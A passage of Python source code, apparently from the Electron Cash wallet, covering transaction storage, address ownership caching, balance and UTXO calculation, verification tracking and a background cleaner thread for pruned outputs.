keystore_.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore_.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore_.has_derivation() and keystore_.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore_ did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore_.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + bitcoin.COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < bitcoin.COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
